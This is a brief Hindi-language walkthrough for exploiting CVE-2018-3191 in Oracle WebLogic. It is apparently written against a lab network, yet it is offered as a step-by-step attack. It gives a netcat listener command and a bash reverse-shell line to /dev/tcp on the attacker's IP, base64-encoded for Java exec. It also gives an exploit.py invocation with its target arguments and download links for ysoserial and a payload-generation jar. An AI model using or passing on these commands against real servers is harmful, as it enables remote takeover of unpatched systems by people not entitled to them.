
CVE-2018-3191 रिवर्स शेल
CVE-2018-3191 रिवर्स शेल स्थानीय आईपी: 172.16.38.1 वेबलॉजिक: 172.16.38.174:7001
फिर nc -lvv 7777 निष्पादित करें
(1) bash कमांड में Runtime.getRuntime().exec() के दौरान विशेष प्रतीकों के एस्केपिंग से बचने के लिए base64 एन्कोडिंग/डिकोडिंग का उपयोग किया गया है; सादा पाठ है: bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 (2) यह ऑपरेशन स्थानीय रूप से एक JRMPListener को सुनता है, हमला किए गए वेबलॉजिक से अनुरोध प्राप्त करता है, और निर्दिष्ट bash रिवर्स कमांड को निष्पादित करता है। (3) Nc पोर्ट 7777 पर सुनता है, वेबलॉजिक होस्ट से bash रिवर्स कनेक्शन की प्रतीक्षा करता है। 2. निष्पादित करें: python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222, इस भेद्यता का उपयोग करके वेबलॉजिक को रिमोट आरएमआई सेवा तक पहुंचने और bash रिवर्स कमांड निष्पादित करने के लिए मजबूर करता है।
हमले के लिए आवश्यक उपकरण: ysoserial-master.jar // डिसीरियलाइज़ेशन शोषण उपकरण https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // CVE-2018-3191 पेलोड जनरेशन उपकरण https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py // वेबलॉजिक t3 प्रोटोकॉल भेजने वाला उपकरण, CVE-2018-3191 पेलोड एकीकृत